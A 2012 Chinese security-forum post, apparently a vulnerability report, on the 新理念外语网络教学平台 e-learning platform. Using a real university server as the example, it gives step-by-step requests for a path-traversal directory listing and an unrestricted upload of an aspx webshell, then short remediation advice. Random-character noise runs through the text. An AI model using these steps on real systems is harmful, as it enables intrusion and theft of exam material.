中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
# o" P0 Q/ _3 f, r8 q4 L+ ?
+ O8 I+ G  z8 ]) D9 A5 d) a以南开大学的为例:
+ B; ^5 [3 s6 [; M& Xhttp://222.30.60.3/NPELS
) [; e0 Y5 c. K! k3 eNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
; S8 s+ T7 i5 f8 O</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
/ J9 H# p5 r' ^3 T9 |) F使用GetTestClientFileList操作，直接 HTTP GET 列目录：
& m: _& \2 }3 ]5 h6 H* d8 {, mhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
1 r1 l  R7 L* g' I$ W! j# O& W
' z! t5 J% _" ^0 `- D, W发现
7 f8 y7 |, B9 Q. U- d( Chttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
; @- @3 F) g) M( ^可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
, ]- V" n9 ]# \. i7 H; t上传后继续列目录找到木马地址直接访问即可

OOXX
5 o; a1 V/ L# u1 \' F& O/ i
% P; V7 _) a1 `& J2 pGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
$ d! \' i1 G6 ]& a+ o' `  |漏洞证明：
! C+ c5 W$ p8 n  S
* X! E) G2 O1 c, p' w列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm
6 Z! C+ h- W  u- U
上传木马：
0 N$ F& y( C0 a  w4 jhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
; z$ r5 L& N* ]& Y好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2